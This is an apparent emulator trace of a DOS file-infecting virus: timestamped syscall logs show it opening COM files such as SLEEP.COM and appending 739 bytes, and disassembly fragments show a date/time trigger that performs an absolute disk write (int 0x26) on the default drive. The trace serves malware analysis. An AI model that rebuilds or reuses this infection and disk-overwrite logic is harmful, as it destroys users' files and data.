2018-12-25T11:58:33.686448462Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.695311872Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.696527705Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.704224786Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.712156809Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.714689856Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.721963268Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.72812381Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.729424865Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.732938669Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.74069824Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.742089121Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.749900767Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.758866236Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.761572355Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.764572629Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.766702888Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.387626165Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.38916899Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.394683075Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.400624127Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.406436992Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.407875286Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.410246199Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.440235863Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.441779124Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.447492632Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.454692951Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.45779754Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.463493609Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.469446947Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.471092277Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.473522177Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.480316239Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.481922427Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.487715429Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.494955229Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.497467113Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.50328757Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.508792487Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.510038785Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.512635883Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.519807193Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.521265582Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.528385269Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.534201606Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.536869147Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.544562128Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.548952946Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.550011423Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.553085448Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.562270604Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.564205454Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.572289886Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.581535078Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.584615019Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.59219951Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.600119494Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.601604887Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.604376207Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.613625194Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.615181731Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.622488505Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.632411023Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.635238577Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.64244046Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.650535072Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.652532751Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.655904889Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.667036634Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.668654295Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.676161134Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.686236502Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.689526739Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.696971332Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.704003422Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.705868042Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.708734892Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.717203946Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.719357956Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.726778973Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.735598656Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.738762461Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.741213123Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.743630264Z 44 PC: 12be2 | Get time
0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:33.747075467Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:33.753012273Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.432218947Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.433409753Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.440740277Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.447885081Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.454809656Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.456740774Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.459590373Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.47462201Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.476743964Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.483876093Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.492920161Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.496743516Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.503993422Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.511828366Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.514333276Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.517573124Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.526360003Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.528428278Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.536024261Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.545042217Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.547690285Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.555260225Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.562729439Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.564632248Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.570374979Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.579655768Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.581227502Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.589730262Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.59959823Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.60636519Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.614940857Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.622154446Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.623775587Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.626965521Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.636433783Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.637956336Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.645144872Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.654398799Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.657565249Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.664764108Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.672428547Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.673988047Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.677119301Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.688115451Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.689735627Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.697051675Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.70782314Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.710711747Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.718168596Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.726755657Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.72825384Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.73099232Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.740959763Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.742771644Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.749998801Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.759094429Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.763018837Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.771503411Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.778817967Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.780938932Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.784067844Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.793121741Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.79540368Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.800008804Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.809272396Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.812299788Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.814607036Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.816887067Z 44 PC: 12be2 | Get time
0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:33.81938498Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:33.825568819Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.727375673Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.735268825Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.740872278Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.747614213Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.752074192Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.754495068Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.756608172Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.769260606Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.771167066Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.779769532Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.78638316Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.800268929Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.807639066Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.814581065Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.81659072Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.819591805Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.828407102Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.830262792Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.838695234Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.847956642Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.851101837Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.859499266Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.866802214Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.868257689Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.872125927Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.880820255Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.882272024Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.890257879Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.899133491Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.901713286Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.909262824Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.916228669Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.917461578Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.920079756Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.925674981Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.926773314Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.931450552Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.940612512Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.943373519Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.950531022Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.957817283Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.959384726Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.962451908Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.971554709Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.973167576Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.980877714Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.990312931Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.992428589Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.998750548Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:34.006781108Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:34.008260559Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:34.012024405Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:34.023915449Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:34.025896503Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:34.033994695Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:34.04263746Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:34.045835859Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:34.053217942Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:34.061165836Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:34.063185046Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:34.066366619Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:34.07520658Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:34.077344225Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:34.084484333Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:34.093348504Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:34.097042713Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:34.099422691Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:34.101810002Z 44 PC: 12be2 | Get time
0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:34.10468489Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:34.111224577Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:34.348919957Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:34.35112256Z 78 PC: 12afb | Find first file
2018-12-25T11:58:34.357387478Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:34.3650738Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:34.373299387Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:34.374796007Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:34.377329438Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:35.238584652Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:35.240344761Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:35.245495861Z 62 PC: 12aef | Close file
2018-12-25T11:58:35.35664354Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:35.358668237Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:35.363095444Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:35.368377618Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:35.370853105Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:35.372691131Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:35.466876421Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:35.469855072Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:35.476814447Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:35.5428143Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:35.546387759Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:35.552899934Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:35.55930683Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:35.56121256Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:35.563993784Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:35.695831446Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:35.698129896Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:35.704584985Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:35.783077733Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:35.786427714Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:35.793033917Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:35.799350542Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:35.801439408Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:35.803997197Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:35.933695311Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:35.935228105Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:35.942083334Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:36.047330016Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:36.050286826Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:36.057566932Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:36.063826935Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:36.065431584Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:36.069199754Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:36.271483049Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:36.2731388Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:36.286035687Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:36.307116215Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:36.309632517Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:36.31646759Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:36.324034641Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:36.326447681Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:36.329578216Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:36.355497047Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:36.356840151Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:36.364469229Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:36.380708232Z 79 PC: 12afb | Find next file (See above)
